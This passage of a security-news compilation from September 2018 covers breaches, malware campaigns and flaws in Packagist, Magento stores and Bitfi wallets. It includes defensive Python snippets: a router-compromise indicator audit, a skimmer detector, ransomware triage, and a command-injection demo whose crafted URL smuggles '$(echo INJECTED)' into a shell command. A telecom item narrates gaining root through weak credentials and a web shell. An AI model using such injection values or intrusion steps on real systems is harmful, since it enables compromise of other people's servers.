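    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):
            current = line
            sections.setdefault(current, [])
            continue
        if current is None:
            continue
        verb, _, rest = line.partition(" ")
        entry: Entry = {"_verb": verb}
        for key, val in _KV_RE.findall(rest):
            entry[key] = val.strip('"')
        sections[current].append(entry)
    return sections


def audit(text: str) -> List[str]:
    """Return one finding per indicator; an empty list means none were seen."""
    s = parse_export(text)
    findings: List[str] = []

    socks = [e for e in s.get("/ip socks", []) if e.get("enabled") == "yes"]
    for e in socks:
        port = e.get("port", "1080")
        note = " (the port used in the Netlab campaign)" if port == "4153" else ""
        findings.append(f"socks4 proxy enabled on TCP/{port}{note}")
    if socks:
        # The campaign restricted proxy access to a single net-block.
        allowed = [e["src-address"] for e in s.get("/ip socks access", [])
                   if e.get("action") == "allow" and "src-address" in e]
        if allowed:
            findings.append("socks access allowed only from " + ", ".join(allowed))

    if any(e.get("enabled") == "yes" for e in s.get("/ip proxy", [])):
        denies = sum(1 for e in s.get("/ip proxy access", []) if e.get("action") == "deny")
        findings.append(f"http proxy enabled with {denies} deny ACL rule(s); "
                        "inspect the proxy error page for injected script")

    for e in s.get("/tool sniffer", []):
        if e.get("streaming-enabled") == "yes":
            findings.append("packet sniffer streams captured traffic to "
                            + e.get("streaming-server", "<unset>"))

    for e in s.get("/system scheduler", []):
        # A periodic '/tool fetch' of an external URL is the phone-home pattern.
        m = re.search(r"fetch\b.*?\burl=(\S+)", e.get("on-event", ""))
        if m:
            findings.append(f"scheduler task '{e.get('name', '?')}' fetches "
                            f"{m.group(1)} every {e.get('interval', '?')}")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_EXPORT):
        print("[!]", finding)
```

Feed it the output of `/export` taken over a trusted channel; an empty result only means these particular indicators are absent, so the firmware should still be updated regardless.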

Google paid million dollars to track offline purchases using Mastercard Data
4.9.2018 securityaffairs CyberCrime

Google has paid Mastercard millions of dollars to access offline transactions of its users, the news was revealed by Bloomberg.
New problems for Google, experts discovered a secret agreement of the tech giant with Mastercard to track user purchases offline.

Google has paid Mastercard millions of dollars to access offline transactions of its users.

The embarrassing agreement was revealed by Bloomberg that cited four unidentified people with knowledge of the deal.

Google used Mastercard data to track whether its ads led to a sale at a physical store in the U.S.

Google and Mastercard signed the agreement after a four-year negotiation, it gives the company all Mastercard transaction data in the US.

Neither Mastercard nor Google has ever disclosed the deal; roughly two billion Mastercard holders are unaware that Big G was tracking them.

“Alphabet Inc.’s Google and Mastercard Inc. brokered a business partnership during about four years of negotiations, according to four people with knowledge of the deal, three of whom worked on it directly.” reads the report published by Bloomberg.

“The alliance gave Google an unprecedented asset for measuring retail spending, part of the search giant’s strategy to fortify its primary business against onslaughts from Inc. and others.”

Google used the data to fuel a new tool for advertisers, called Store Sales Measurement, that is currently in a test phase for a restricted group of advertisers. The tool aims at tracking the conversion rate of online advertisements into real-world retail sales.

Google has never revealed the source of the data used by its Store Sales Measurement service since its presentation; the company only declared that its customers had access to approximately 70% of U.S. credit and debit cards through partners.

“People don’t expect what they buy physically in a store to be linked to what they are buying online,” said Christine Bannan, counsel with the advocacy group Electronic Privacy Information Center (EPIC).

“There’s just far too much burden that companies place on consumers and not enough responsibility being taken by companies to inform users what they’re doing and what rights they have.”

This suggests that Google has deals not just with Mastercard but with other credit card companies as well, covering in total 70% of the people who use credit and debit cards in the United States.

However, it seems that users can reportedly opt out of offline ad tracking by merely turning off “Web and App Activity” in their Google account.

Mastercard denied that it has provided personal information to any third parties.

“Regarding the [Bloomberg] article you cited, I’d quickly note that the premise of what was reported is false. The way our network operates, we do not know the individual items that consumer purchases in any shopping cart—physical or digital.” a Mastercard spokesperson said in a statement:

“No individual transaction or personal data is provided. That delivers on the expectation of privacy from both consumers and merchants around the world. In processing a transaction, we see the retailer’s name and the total amount of the consumer’s purchase, but not specific items.”

Compromising Proxy Call Session Control Function (P-CSCF) using VoLTE
4.9.2018 securityaffairs Hacking

The IP Multimedia Subsystem (IMS) facilitates telecom operators in delivering multimedia applications and voice traffic over IP transport. The Proxy Call Session Control Function (P-CSCF) is the first node in the IMS platform (figure 1) to interact with the User Equipment (UE) when initiating a VoLTE call.
figure 1 – Placement of Proxy Call Session Control Function in IMS Platform
Identify and Compromise Proxy Call Session Control Function with VoLTE phone:
1) Initiate a call with VoLTE phone and simultaneously open phone’s terminal to list currently established sessions. It was possible to identify the IP address of serving P-CSCF node, connected on port 5060 (figure 2).

figure 2 – Identifying P-CSCF node connected on port 5060 (SIP protocol)
2) Management console of an application server and Proxy Call Session Control Function application (figure 3 & figure 4) were found by performing a service scan on identified IP address.

figure 3 – P-CSCF application’s management console
figure 4 – Application server’s management console
3) Application server, Oracle Glassfish, was found to be weakly configured and could be accessed using weak credentials (figure 5).

figure 5 – Access to Oracle Glassfish server using weak credentials
4) A reverse shell was triggered using a web shell, which gave root access to the P-CSCF node (figure 6).

figure 6 – Gained root access to P-CSCF (IMS)
After gaining access to the IMS platform, an attacker can compromise other core telecom components in the network.

To prevent such attacks, telecom operators should ensure traffic segregation between user plane, control plane, and management plane. It is highly recommended to patch all the core network elements with the latest security patches released by the vendor. Also, develop and implement minimum security guidelines before integrating nodes in the network.

Hope you enjoyed reading, suggestions are always welcome.

The original post is available at:

Parental control spyware app Family Orbit hacked, pictures of hundreds of monitored children were exposed
4.9.2018 securityaffairs Hacking

The company that sells the parental control spyware app Family Orbit has been hacked, pictures of hundreds of monitored children were left online.
The company that sells the parental control spyware app Family Orbit has been hacked, the pictures of hundreds of monitored children were left online only protected by a password.

According to Motherboard that first reported the news, the Family Orbit spyware left exposed nearly 281 GB of data online. The hacker discovered the huge trove of data that was stored on an unsecured server and reported the discovery to Motherboard. The hacker found the key on the cloud servers of the spyware app.

“A company that sells spyware to parents left the pictures of hundreds of monitored children online, only protected by a password that almost anyone could find, according to a hacker.” states Motherboard.

“The hacker, who’s mainly known for having hacked spyware maker Retina-X, wiping its servers (twice), said he was able to find the key to the cloud servers of Family Orbit, a company that that markets itself as “the best parental control app to protect your kids.” The servers contained the photos intercepted by the spyware, according to the hacker. The company confirmed the breach to Motherboard.”

Family Orbit spyware

Experts found a Rackspace storage account with about 3,836 containers that also included video footage.

“I had all photos uploaded from the phones of kids being monitored, and also some screenshots of the developer’s desktops which exposed passwords and other secrets,” stated the unidentified hacker.

Motherboard also verified the data breach and stated that the data belonged to active users who used those email addresses to register to the service. Motherboard assessed 6 of the email addresses and concluded that the addresses were active.

The data was protected only by an easy-to-guess password. The hacker found the key on the cloud servers of the spyware app.
The hacker who discovered the unprotected server is the same one who hacked the servers of another spyware vendor, Retina-X, two times.

The company confirmed the data breach to Motherboard, its representative told Motherboard that the API key is stored encrypted in the app, and that the company observed “unusual bandwidth” used in their cloud storage.

“We have immediately changed our API key and login credentials. The sales and the services have been taken offline until we ensure all vulnerabilities are fixed,” the representative said via email.

The incident is not isolated; companies that sell spyware are a favored target of hackers who protest against the abuse of technology for surveillance purposes.

In the last 18 months, eight other companies that sell spyware have been hacked, among them FlexiSpy, Retina-X, TheTruthSpy, Mobistealth, Spy Master Pro, Spyfone and SpyHuman.

Critical remote code execution flaw patched in Packagist PHP package repository
4.9.2018 securityaffairs

Maintainers of Packagist, the largest PHP package repository, have recently addressed a critical remote code execution vulnerability.
Packagist is the default package host behind Composer, it has over 435 million package installs.

The vulnerability was reported by the security researcher Max Justicz, the expert discovered that the “Submit Package” input field for submitting new PHP packages via the package repository homepage allowed an attacker to execute a malicious command in the format of “$(execute me)”.

“You could type $(execute me) into a big text field on the site and it would execute your command in a shell (twice).” reads the security advisory published by the expert.

“You upload packages to Packagist by providing a URL to a Git, Perforce, Subversion, or Mercurial repository. To identify what kind of repository the URL points to, Packagist shells out to git, p4, svn, and hg, with application-specific commands that include this URL as an argument,”


The expert pointed out that when a user submitted a URL, Packagist did not properly escape it, allowing an attacker to execute arbitrary commands in a shell (twice).

The mitigation was simple: the maintainers of the Packagist repository escaped the relevant parameters in the Composer repository.

“The Packagist team quickly resolved this issue by escaping the relevant parameters in the Composer repository,” explained Justicz.

The expert warned that the low level of security implemented in package managers in general could open the door to future attacks.

“Package manager security is not always great, and you should probably plan on your package manager servers being compromised in the future. In the past year or so I have found bugs that let me execute arbitrary code on, execute code on some of npm’s official mirrors (not the main registry), delete arbitrary release files from PyPI, serve arbitrary JS on every site using a popular CDN for npm, and now execute arbitrary code on” concludes the expert.

“I think it is a security anti-pattern to have application build pipelines pull fresh downloads of packages from upstream servers on every build if the packages are not expected to change. If for some reason you have to do this, you should pin dependencies using a cryptographically secure hash function.”
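As an added illustration (not Packagist's or Composer's code), the following Python reproduces the two points above with a benign `echo` standing in for the git/p4/svn/hg probe: interpolating an unescaped URL into a shell string lets a `$(...)` substitution run, while quoting the argument or avoiding the shell keeps it a literal; a hash-pin check of the kind Justicz recommends is included. The URL, host and package bytes are constructed.

```python
import hashlib
import hmac
import shlex
import subprocess

# Constructed input: a "repository URL" carrying a command substitution,
# the shape of the input that reached Packagist's shell-out unescaped.
INJECTED_URL = "https://example.invalid/repo.git $(echo INJECTED)"

# Constructed package payload; its SHA-256 plays the role of a pinned hash.
SAMPLE_PACKAGE = b"<?php // constructed package contents\n"


def build_cmd_unsafe(url: str) -> str:
    """Flawed pattern: interpolate the raw URL into a shell command string.
    `echo` stands in for the VCS command Packagist shells out to."""
    return f"echo {url}"


def build_cmd_safe(url: str) -> str:
    """Fixed pattern: quote the argument so the shell sees one literal word
    (the equivalent of PHP's escapeshellarg)."""
    return f"echo {shlex.quote(url)}"


def run_through_shell(cmd: str) -> str:
    """Run a command string through /bin/sh, as a shell_exec-style call would."""
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout.strip()


def run_without_shell(argv: list) -> str:
    """Safest option: no shell at all, so no word splitting or substitution."""
    return subprocess.run(argv, capture_output=True, text=True).stdout.strip()


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_pinned(data: bytes, expected_sha256: str) -> bool:
    """Hash-pin check: a freshly downloaded artifact must match the hash
    recorded when the dependency was pinned, compared in constant time."""
    return hmac.compare_digest(sha256_hex(data), expected_sha256.lower())


if __name__ == "__main__":
    print("unsafe  :", run_through_shell(build_cmd_unsafe(INJECTED_URL)))
    print("quoted  :", run_through_shell(build_cmd_safe(INJECTED_URL)))
    print("no-shell:", run_without_shell(["echo", INJECTED_URL]))
    print("pin ok  :", verify_pinned(SAMPLE_PACKAGE, sha256_hex(SAMPLE_PACKAGE)))
```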

Kaspersky warns of a new Loki Bot campaign target corporate mailboxes
4.9.2018 securityaffairs BotNet

Security experts from Kaspersky Lab have uncovered a new spam campaign leveraging the Loki Bot malware to target corporate mailboxes.
The Loki Bot attacks started in July and aimed at stealing passwords from browsers, messaging applications, mail and FTP clients, and cryptocurrency wallets.

Loki Bot operators employ various social engineering techniques to trick victims into opening weaponized attachments that deploy the Loki Bot stealer.

The messages carry attachments with the .iso extension, a file type that serves as a container for delivering the malware.

“Starting from early July, we have seen malicious spam activity that has targeted corporate mailboxes. The messages discovered so far contain an attachment with an .iso extension that Kaspersky Lab solutions detect as Loki Bot.” reads the analysis published by Kaspersky.

“The malware’s key objective is to steal passwords from browsers, messaging applications, mail and FTP clients, and cryptocurrency wallets. Loki Bot dispatches all its loot to the malware owners.”

The messages masquerade as notifications from other companies, or as orders and offers.

Threat actors are sending out copies of Loki Bot to company email addresses that were available on public sources or from the companies’ own websites.


Experts observed different spam messages including fake notifications from well-known companies, fake notifications containing financial documents, and fake orders or offers.

Researchers highlighted the importance for organizations of adopting security measures that include both technical protections and training for employees.

“Every year we observe an increase in spam attacks on the corporate sector.” Kaspersky concludes.

“The perpetrators have used phishing and malicious spam, including forged business emails, in their pursuit of confidential corporate information: intellectual property, authentication data, databases, bank accounts, etc.”

MagentoCore skimmer already infected 7,339 Magento stores
4.9.2018 securityaffairs Cryptocurrency

The MagentoCore skimmer has already infected 7,339 Magento stores; according to Willem de Groot, who uncovered the campaign, it is the most aggressive to date.
The cybersecurity researcher Willem de Groot has uncovered a massive hacking campaign aimed at Magento stores. The hackers have already infected 7,339 Magento stores with a skimmer script, dubbed MagentoCore, that siphons payment card data from users who purchased on the sites.

The threat actors behind this campaign compromised websites running Magento and injected the payment card scraper into their source code.

The crooks gain access to the control panels of Magento stores through brute-force attacks.

At the time of writing, querying the PublicWWW service we can verify that the MagentoCore script is currently deployed on 5,214 domains.

The malicious script loads on store checkout pages, steals the payment card details entered by users and sends them to a server controlled by the attacker.
Willem de Groot reported that the hacking campaign involves a skimmer script loaded from the domain.

“A single group is responsible for planting skimmers on 7339 individual stores in the last 6 months. The MagentoCore skimmer is now the most successful to date.” de Groot wrote in a blog post.


The expert found the MagentoCore script on 7,339 Magento stores in the past six months; the campaign is still ongoing and the hackers are compromising new Magento stores at a pace of 50 to 60 sites per day.

“The average recovery time is a few weeks, but at least 1450 stores have hosted the parasite during the full past 6 months,” de Groot says. “New brands are hijacked at a pace of 50 to 60 stores per day.” continues the expert.

Once the attackers succeed in compromising a website, they add an embedded piece of JavaScript to the HTML template:

<script type="text/javascript" src="hxxps://"></script>
This script records keystrokes from customers and sends them to “” server.

The expert noticed that the malware implements a re-infection mechanism: it adds a backdoor to the Magento cron.php that periodically downloads the malicious code and, after running, deletes itself.

“The victim list contains multi-million dollar, publicly traded companies, which suggests the malware operators make a handsome profit,” de Groot added.

“But the real victims are eventually the customers, who have their card and identity stolen.”

According to Bleeping Computer, which quoted Yonathan Klijnsma, Threat Researcher Lead at RiskIQ, the MagentoCore campaign is actually part of a larger card-scraping campaign known as MageCart that has been active since late 2015.

According to de Groot, currently, 4.2% of all Magento stores are infected with one or more skimmer scripts.
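An added detection helper for store operators (not code from de Groot or from Magento): it parses a checkout template, collects every external `<script src>` and reports those loaded from hosts outside an allowlist, which is how an injected tag of the shape shown above stands out. The allowlist, template and skimmer host are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed allowlist: hosts this store legitimately loads scripts from.
ALLOWED_SCRIPT_HOSTS = {"shop.example.invalid"}

# Constructed checkout template: a same-origin script, an allowed CDN script,
# and one injected tag pointing at a made-up skimmer host.
SAMPLE_TEMPLATE = """<html><head>
<script type="text/javascript" src="/js/mage/checkout.js"></script>
<script type="text/javascript" src="https://shop.example.invalid/js/app.js"></script>
<script type="text/javascript" src="https://skimmer-host.invalid/mage.js"></script>
</head><body><form id="checkout"></form></body></html>"""


class _ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in a document."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names for us.
        if tag == "script":
            for name, value in attrs:
                if name == "src" and value:
                    self.srcs.append(value)


def script_host(src):
    """Hostname a script src resolves to, or None for same-origin paths.
    Defanged hxxp(s):// prefixes from IoC lists are normalised first."""
    if src.lower().startswith("hxxp"):
        src = "http" + src[4:]
    return urlparse(src).hostname


def find_foreign_scripts(html, allowed_hosts):
    """Return script srcs loaded from hosts outside the allowlist."""
    parser = _ScriptSrcCollector()
    parser.feed(html)
    foreign = []
    for src in parser.srcs:
        host = script_host(src)
        if host is not None and host.lower() not in allowed_hosts:
            foreign.append(src)
    return foreign


if __name__ == "__main__":
    for src in find_foreign_scripts(SAMPLE_TEMPLATE, ALLOWED_SCRIPT_HOSTS):
        print("foreign script:", src)
```

Running the same check over the rendered checkout page, not just the template on disk, also catches scripts injected by the cron.php backdoor after deployment.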

Willem de Groot
@gwillem skimmer planted on 7337 stores; removes competing skimmers; periodically resets admin passwords to "how1are2you3" …

12:58 PM - Aug 30, 2018 · The Hague, The Netherlands

Willem de Groot
4.2% of all Magento stores globally are currently leaking payment and customer data

2:55 PM - Aug 27, 2018

John McAfee’s Bitfi cryptocurrency wallet was hacked by a security duo
4.9.2018 securityaffairs Hacking

A security duo composed of Saleem Rashid and Ryan Castellucci demonstrated that it is possible to hack John McAfee’s Bitfi cryptocurrency wallet.
Today let’s discuss John McAfee’s cryptocurrency wallet, the Bitfi wallet, which the popular cyber security expert declared “unhackable.”

Unfortunately, nothing is unhackable, and the Bitfi wallet has already been hacked twice.

The Bitfi wallet is an Android-powered hardware device for storing cryptocurrencies and crypto assets.

A team of security researchers called THCMKACGASSCO devised a new attack that could allow them to steal all the stored funds from an unmodified Bitfi wallet.

The wallet relies on a user-generated secret phrase and a “salt” value to cryptographically scramble the secret phrase. The experts who devised the attack explained that the secret phrase and salt can be obtained, allowing attackers to generate the private keys and steal the funds.

“The Android-powered $120 wallet relies on a user-generated secret phrase and a “salt” value — like a phone number — to cryptographically scramble the secret phrase. The idea is that the two unique values ensure that your funds remain secure.” reported

“But the researchers say that the secret phrase and salt can be extracted, allowing private keys to be generated and the funds stolen”

The security duo composed of Saleem Rashid and Ryan Castellucci, members of the THCMKACGASSCO team, developed the exploits for the attack and published a video PoC of the hack. The video shows that, after setting a secret phrase and salt and running a local exploit, it is possible to extract the keys from the device.

The video shows that the attack can be executed in less than two minutes.

Saleem "Unhackable" Rashid
· Aug 30, 2018
Bill Powell of @Bitfi6 discussing the single assumption upon which the entirety of @Bitfi6's ridiculous UNHACKABLE claim lies

could you even IMAGINE if this assumption was proved false? …


Saleem "Unhackable" Rashid
on a completely unrelated note, here is a @Bitfi6 being cold boot attacked.

it turns out that rooting the device does not wipe RAM clean. who would have thought it!?

🎶 i feel this music is very appropriate for @Bitfi6 🎶

10:53 PM - Aug 30, 2018

Rashid explained that they discovered the keys remain in memory longer than Bitfi claims. The experts devised a technique to run code on the hardware wallet without erasing the contents of memory, which included the keys, and were then able to extract the memory contents, keys included.

The bad news is that the attack is trivial to carry out and doesn’t require any specific hardware, as explained by Andrew Tierney, a security researcher with Pen Test Partners who verified the new attack.

Tierney was one of the members of the hacking team that carried out the first Bitfi attack.

Ask Cybergibbons!
Well, that's a transaction made with a MitMed Bitfi, with the phrase and seed being sent to a remote machine.

That sounds a lot like Bounty 2 to me.

2:51 PM - Aug 13, 2018
McAfee offered a $250,000 bounty to anyone who could successfully carry out an attack on the wallet that resulted in the theft of the coins.

Bitfi did not pay out the bug bounty because the attack demonstrated by the researchers was outside the scope of the bounty.

John McAfee

The press claiming the BitFi wallet has been hacked. Utter nonsense. The wallet is hacked when someone gets the coins. No-one got any coins. Gaining root access in an attempt to get the coins is not a hack. It's a failed attempt. All these alleged "hacks" did not get the coins.

8:17 PM - Aug 3, 2018

Matthew Green
I haven’t really been following this Bitfi nonsense, but I do so love when companies threaten security researchers.

1:39 PM - Aug 6, 2018

Unlike the first hack, this second one demonstrated by the security duo appears to be in scope for the bug bounty.

Bill Powell, vice president of operations at Bitfi, told TechCrunch in an email that the company defines a hack “as anything that would allow an attacker to access funds held by the wallet.”

After the researchers published the video PoC of the attack, Bitfi announced that it had hired an experienced security manager, who is confirming the vulnerabilities identified by researchers.

Rashid will not publicly disclose the exploit code to avoid hackers using it.

Wireshark fixed three flaws that can crash it via malicious packet trace files
4.9.2018 securityaffairs

The Wireshark team has addressed three serious vulnerabilities that could be exploited by a remote unauthenticated attacker to crash the analyzer.
The Wireshark development team has fixed three serious flaws that could be exploited by a remote unauthenticated attacker to trigger a DoS condition in the world’s most popular network protocol analyzer.

The three vulnerabilities tracked as CVE-2018-16056, CVE-2018-16057 and CVE-2018-16058 affect respectively the Bluetooth Attribute Protocol (ATT) dissector, the Radiotap dissector, and the Audio/Video Distribution Transport Protocol (AVDTP) dissector components of Wireshark.

Proof-of-concept (PoC) exploit code for each flaw is publicly available and the vulnerabilities are trivial to exploit: an attacker can inject a malformed packet into a network, or trick the victim into opening a malicious packet trace file.

“To exploit the vulnerability, the attacker may use misleading language and instructions to convince a user to open a malicious packet trace file.” reads the security advisory published for the CVE-2018-16057 flaw.

“To inject malformed packets that the Wireshark application may attempt to parse, the attacker may need access to the trusted, internal network where the targeted system resides. This access requirement may reduce the likelihood of a successful exploit.”

In any case, triggering the flaws requires the victim to open a malicious packet trace file, a circumstance that makes the likelihood of exploitation very low.


Wireshark users need to upgrade to one of the fixed versions: 2.6.3, 2.4.9, or 2.2.17.

Below is the list of safeguards provided by Cisco in its security advisory:

Administrators are advised to apply the appropriate updates.
Administrators are advised to allow only trusted users to have network access.
Administrators are advised to run both firewall and antivirus applications to minimize the potential of inbound and outbound threats.
Administrators may consider using IP-based access control lists (ACLs) to allow only trusted systems to access the affected systems.
Administrators can help protect affected systems from external attacks by using a solid firewall strategy.
Administrators are advised to monitor affected systems.

The cyber threat against Danish financial sector is very high
4.9.2018 securityaffairs Cyber

A report published by the Centre for Cyber Security (Center for Cybersikkerhed) states that the threat to the Danish financial sector is very high.
According to a report by the Centre for Cyber Security (Center for Cybersikkerhed), a department of military security agency FET (Forsvarets Efterretningstjeneste), the cyber threat against the Danish financial sector is very high.

The centre monitors the attacks against Denmark and Danish businesses.

“The threat posed to the Danish financial sector by cyber crime is very high,” reads the report published by the centre.

The threat is “becoming increasingly advanced and complex, and cyber attacks can disrupt the access to Danish financial sector services.”

The centre warns of a specific threat with “capacity, intention, planning and possible implementation. Attack/damaging activity is very likely.”

The government experts believe that cyber espionage represents one of the main threats to the country and its businesses.

Digital espionage is also considered to be a high area of risk, according to the report.

“It is likely that foreign states have both political and economic interest in conducting cyber espionage against the Danish financial sector,” continues the report.

It is interesting to note that the Government centre classifies the threat of cyber terrorism to the financial industry as low.

“But the report also found only a low threat of cyber terror, in which cyber attacks would aim to completely bring down financial systems in Denmark,” states The Local news agency.

“Finans Danmark, a representative organisation for the financial sector, said it recognised the level of cyber threat described by the agency report.”


Cybercriminal organizations focused on banks are intensifying their actions and their operations are becoming even more sophisticated. In the last years, security experts have monitored the activities of several threat actors specialized in attacks aimed at the financial sector and their customers.

“As the systems at banks become stronger, so too do the methods used by cyber criminals become more advanced, and that requires us to constantly keep up,” Finans Danmark director of digitalisation Michael Busk-Jepsen wrote in a press statement.

“There is no doubt that crime aimed at banks and bank customers via the internet is growing,” Busk-Jepsen added.

TrendMicro links Urpage hacking crew to other threat actors
4.9.2018 securityaffairs Hacking

Last week, security researchers from Trend Micro discovered a new threat actor, tracked as Urpage, that shares similarities with three other hacking crews.
Researchers from Trend Micro linked a recently discovered actor, tracked as Urpage, to the hacking groups known as Bahamut, Confucius, and Patchwork.

Trend Micro first connected the Confucius group to the Patchwork crew in early 2018, then discovered many similarities between the groups.

The Patchwork group (aka Dropping Elephant and Chinastrats) was first spotted by Kaspersky Lab in 2016, when it targeted organizations in multiple industries. The group’s activities focus on diplomatic and government targets, though in some campaigns it also targeted private businesses.

China’s foreign relations efforts appear to represent the main interest of the Patchwork group.

“In this case we dig deeper into the possible connection between cyberattacks by focusing on the similarities an unnamed threat actor shares with Confucius, Patchwork, and another threat actor called Bahamut. For the sake of this report, we will call this unnamed threat actor “Urpage.”” reads the analysis published by Trend Micro.

“What sets Urpage attacks apart is its targeting of InPage, a word processor for Urdu and Arabic languages. However, its Delphi backdoor component, which it has in common with Confucius and Patchwork, and its apparent use of Bahamut-like malware, is what makes it more intriguing as it connects Urpage to these other known threats.”

Back to the present: the Urpage hackers target the InPage word processor, used for the Urdu and Arabic languages on both Windows and Mac systems. The attackers leverage a Delphi backdoor that links them to the Confucius and Patchwork groups, as well as Android malware similar to Bahamut’s.

The Android malware used by the Urpage group connects to its own command and control (C&C) infrastructure.

Some of the C&C websites used by the group also act as phishing sites that lure users into downloading malicious applications.

“The threat actor sets up these fake websites describing the application and linking to the Google Play Store to download it, like in the case of the malicious website, pikrpro[.]eu, seen below” continues the report.

The Urpage malware is a data stealer like the Bahamut applications, it can collect data from the infected host such as network information and the MAC address, it can steal SMS messages and contacts, record audio, retrieve GPS location, and steal files with specific extensions.

Experts noticed that some C&C servers also host other malicious documents that link the Urpage group to the other groups.


One of the C&Cs was hosting a weaponized RTF file that triggers the CVE-2017-8750 flaw and an InPage file that exploits CVE-2017-12824.

Another similarity between Urpage and the other groups is the use of the same Delphi file stealer.

In conclusion, Urpage appears to be linked to the other threat actors, most closely to the Patchwork group: it leverages the same Android application, uses the same registration pattern for its C&C domains, and its infrastructure is close to an old Patchwork domain.

The evidence collected by the experts suggests that the attacks conducted by the groups are part of a wider coordinated operation.

“The many similarities and connections show that threat actors do not work in isolation, and that attacks do not necessarily appear from out of nowhere. This may even suggest that a single development team may be behind this attack — maybe a single paid group that has sold its tools and services to other groups with different goals and targets. We’ve summarized all the mentioned findings in the table below.” concludes Trend Micro.

Arjen Kamphuis, the Dutch associate of Julian Assange, went missing in Norway
4.9.2018 securityaffairs Security

Julian Assange associate and author of “Information Security for Journalists” Arjen Kamphuis has disappeared; the Norwegian police are working on the case.
Media agencies worldwide are reporting the strange disappearance of Arjen Kamphuis, the Julian Assange associate. The news was confirmed by WikiLeaks on Sunday, the man has been missing since August 20, when he left his hotel in the Norwegian town of Bodo.


.@JulianAssange associate and author of "Information Security for Journalists" @ArjenKamphuis has disappeared according to friends (@ncilla) and colleagues. Last seen in Bodø, #Norway, 11 days ago on August 20.

1:43 AM - Sep 1, 2018
According to WikiLeaks, Kamphuis had bought a ticket for a flight departing on August 22 from Trondheim, which is far from Bodo.

His friends believe he disappeared either in Bodo, Trondheim or on the way to the destination.


Update on the strange disappearance of @ArjenKamphuis. Arjen left his hotel in Bodø on August 20. He had a ticket flying out of Trondheim on August 22. The train between the two takes ~10 hours, suggesting that he disappeared in within hours in Bodø, Trondheim or on the train.


3:42 AM - Sep 2, 2018
“A website set up to gather information on the missing person says: “He is 47 years old, 1.78 meters tall and has a normal posture. He was usually dressed in black and carrying his black backpack. He is an avid hiker.”” reported the German website

At the time of writing, there have been two unconfirmed sightings, one in Alesund, Norway, and the other in Ribe, Denmark.

The Norwegian authorities opened an investigation into the case on Sunday.

“We have started an investigation,” police spokesman Tommy Bech told the news agency AFP. At the time, the police “would not speculate about what may have happened to him.”


Hi everyone, small update about #FindArjen; The Norwegian police is working hard on the case now. We are keeping all options open, and hoping he will soon be found🤞

11:13 AM - Sep 3, 2018
According to the Norwegian tabloid Verdens Gang, the Norwegian authorities cannot access the location data collected by Kamphuis’s mobile phone until he is officially reported missing in the Netherlands.

CryptoNar Ransomware Discovered and Quickly Decrypted

This week a new CryptoJoker ransomware variant called CryptoNar was discovered that has infected victims. The good news is that a free decryptor was quickly released so that these victims can get their files back for free.

This ransomware was first discovered by MalwareHunterTeam and at first glance it looks like a ransomware with little to no distribution. While I would normally not write about ransomware like these, it was later learned that this ransomware had encrypted close to 100 victims.

Travis Green
Replying to @malwrhunterteam @demonslay335
Looks like 91 infections starting aug 21st.

7:55 PM - Aug 28, 2018
The good news is that Michael Gillespie was quick to create a free decryptor for this ransomware so victims can get their files back for free.

The CryptoNar Ransomware
When the CryptoNar, or Crypto Nar, Ransomware encrypts a victim's files, it performs the encryption differently depending on the type of file being encrypted.

If the targeted file has a .txt or .md extension, it will encrypt the entire file and append the .fully.cryptoNar extension to the encrypted file's name. All other files will only have the first 1,024 bytes encrypted and will have the .partially.cryptoNar extensions appended to the file's name.
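An added triage helper (not part of this write-up or of Gillespie's decryptor) that applies the rules above to a set of encrypted files: it maps the .fully/.partially names back to their originals, flags files whose mode does not match the documented .txt/.md rule, checks that a partially encrypted file still has its bytes beyond the first 1,024 intact, and lists the encrypted/original pairs a responder could feed to the brute forcer. File names and contents are constructed; the XOR used to build the sample is not CryptoNar's cipher.

```python
from pathlib import Path

FULL_EXT = ".fully.cryptoNar"
PARTIAL_EXT = ".partially.cryptoNar"
PARTIAL_PREFIX_LEN = 1024            # bytes encrypted in non-.txt/.md files
FULLY_ENCRYPTED_TYPES = {".txt", ".md"}

# Constructed sample: a 3,072-byte stand-in for a JPEG, and an "encrypted"
# copy whose first 1,024 bytes are scrambled with XOR 0xFF (sample only,
# not CryptoNar's real cipher) while the tail is left untouched.
_ORIG_JPG = bytes(range(256)) * 12
_ENC_JPG = bytes(0xFF ^ b for b in _ORIG_JPG[:PARTIAL_PREFIX_LEN]) + _ORIG_JPG[PARTIAL_PREFIX_LEN:]

SAMPLE_FILES = {                                      # constructed victim directory
    "notes.txt.fully.cryptoNar": b"\x00" * 64,
    "photo.jpg.partially.cryptoNar": _ENC_JPG,
    "todo.md.partially.cryptoNar": b"\x00" * 50,      # .md should be fully encrypted
}
SAMPLE_ORIGINALS = {"photo.jpg": _ORIG_JPG}           # constructed backup copy


def split_name(name):
    """Map an encrypted file name to (mode, original name); mode is None if not CryptoNar."""
    if name.endswith(FULL_EXT):
        return "full", name[:-len(FULL_EXT)]
    if name.endswith(PARTIAL_EXT):
        return "partial", name[:-len(PARTIAL_EXT)]
    return None, name


def expected_mode(original_name):
    """Mode the write-up documents for this file type."""
    return "full" if Path(original_name).suffix.lower() in FULLY_ENCRYPTED_TYPES else "partial"


def tail_intact(encrypted, original):
    """Partial mode leaves everything after the first 1,024 bytes unchanged."""
    return encrypted[PARTIAL_PREFIX_LEN:] == original[PARTIAL_PREFIX_LEN:]


def intact_bytes(data, mode):
    """How much of the file survives untouched (0 for fully encrypted files)."""
    return 0 if mode == "full" else max(0, len(data) - PARTIAL_PREFIX_LEN)


def triage(files, originals=None):
    """files: {encrypted_name: bytes}; originals: {original_name: bytes} from backups.
    Returns what a responder can rely on before running the decryptor."""
    originals = originals or {}
    report = {"full": [], "partial": [], "unexpected_mode": [],
              "pairs_for_bruteforce": [], "tail_mismatch": []}
    for name, data in files.items():
        mode, orig = split_name(name)
        if mode is None:
            continue                                  # not a CryptoNar artefact
        report[mode].append(orig)
        if mode != expected_mode(orig):
            report["unexpected_mode"].append(name)    # behaviour differs from the write-up
        if orig in originals:
            report["pairs_for_bruteforce"].append((name, orig))
            if mode == "partial" and not tail_intact(data, originals[orig]):
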